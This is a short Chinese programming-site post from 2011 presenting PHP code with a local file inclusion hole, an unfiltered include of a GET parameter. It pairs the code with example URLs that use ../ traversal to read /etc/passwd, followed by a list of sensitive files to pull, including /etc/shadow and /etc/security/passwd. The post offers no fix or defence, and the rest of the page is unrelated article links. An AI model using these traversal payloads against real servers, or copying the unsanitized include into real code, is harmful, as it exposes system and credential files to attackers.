编程 PHP

php 伪造本地文件包含漏洞的代码

Posted in PHP onNovember 03, 2011

代码:

<?php 
$page=$_GET['page']; 
include($page.'php'); 
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

php 伪造本地文件包含漏洞的代码

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

实现php加速的eAccelerator dll支持文件打包下载

Sep 30 PHP

php动态生成JavaScript代码

Mar 09 PHP

php下图片文字混合水印与缩略图实现代码

Dec 11 PHP

PHP计数器的实现代码

Jun 08 PHP

遭遇php的in_array低性能问题

Sep 17 PHP

php中ob函数缓冲机制深入理解

Aug 03 PHP

老生常谈PHP数组函数array_merge(必看篇)

May 25 PHP

总结一些PHP中好用但又容易忽略的小知识

Jun 02 PHP

php中请求url的五种方法总结

Jul 13 PHP

PHP常用的类封装小结【4个工具类】

Jun 28 PHP

Yii框架页面渲染操作实例详解

Jul 19 PHP

laravel在中间件内生成参数并且传递到控制器中的2种姿势

Oct 15 PHP

有关php运算符的知识大全

Nov 03 #PHP

PHP读取txt文件的内容并赋值给数组的代码

Nov 03 #PHP

PHP支持多种格式图片上传(支持jpg、png、gif)

Nov 03 #PHP

PHP安全防范技巧分享

Nov 03 #PHP

防止本地用户用fsockopen DDOS攻击对策

Nov 02 #PHP

PHP隐形一句话后门，和ThinkPHP框架加密码程序(base64_decode)

Nov 02 #PHP

php数组函数序列之krsort()- 对数组的元素键名进行降序排序,保持索引关系

Nov 02 #PHP

计划书(118) 接收函(23) 答谢词(97) 制度(225) 感谢信(72) 评语(336) 证明书(326) 寄语(276) 保证书(97) 方案(1080)

You might like

ThinkPHP模板比较标签用法详解

2014/06/30 PHP

30个php操作redis常用方法代码例子

2014/07/05 PHP

PHP会话控制实例分析

2016/12/24 PHP

php获取'/'传参的值简单方法

2017/07/13 PHP

JavaScript 设计模式学习 Factory

2009/07/29 Javascript

通过隐藏option实现select的联动效果

2009/11/10 Javascript

js/jquery获取文本框输入焦点的方法

2014/03/04 Javascript

jquery uploadify 在FF下无效的解决办法

2014/09/26 Javascript

javascript自动生成包含数字与字符的随机字符串

2015/02/09 Javascript

简介AngularJS的HTML DOM支持情况

2015/06/17 Javascript

jQuery.each使用详解

2015/07/07 Javascript

AngularJS 实现按需异步加载实例代码

2015/10/18 Javascript

javascript中sort排序实例详解

2016/07/24 Javascript

js中常用的Math方法总结

2017/01/12 Javascript

Vue中之nextTick函数源码分析详解

2017/10/17 Javascript

简单解析Django框架中的表单验证

2015/07/17 Python

Python 中pandas.read_excel详细介绍

2017/06/23 Python

python实现微信接口(itchat)详细介绍

2017/10/23 Python

Python中enumerate()函数编写更Pythonic的循环

2018/03/06 Python

tensorflow实现简单的卷积网络

2018/05/24 Python

Python使用sorted对字典的key或value排序

2018/11/15 Python

Django restframework 源码分析之认证详解

2019/02/22 Python

pytorch加载自定义网络权重的实现

2020/01/07 Python

从训练好的tensorflow模型中打印训练变量实例

2020/01/20 Python

python3.7 openpyxl 在excel单元格中写入数据实例

2020/09/01 Python

给水排水工程专业毕业生推荐信

2013/10/28 职场文书

学术会议欢迎词

2014/01/09 职场文书

人民教师求职自荐信

2014/03/12 职场文书

大专生找工作自荐书

2014/06/10 职场文书

简单租房协议书（范本）

2014/10/13 职场文书

消防验收申请报告

2015/05/15 职场文书

党小组评议意见

2015/06/02 职场文书

通讯稿格式及范文

2015/07/22 职场文书

2016元旦文艺汇演主持词（开场白+结束语）

2015/12/03 职场文书

假如给我三天光明：舟逆水而行，人遇挫而达

2019/10/29 职场文书

mysql5.6主从搭建以及不同步问题详解

2021/12/04 MySQL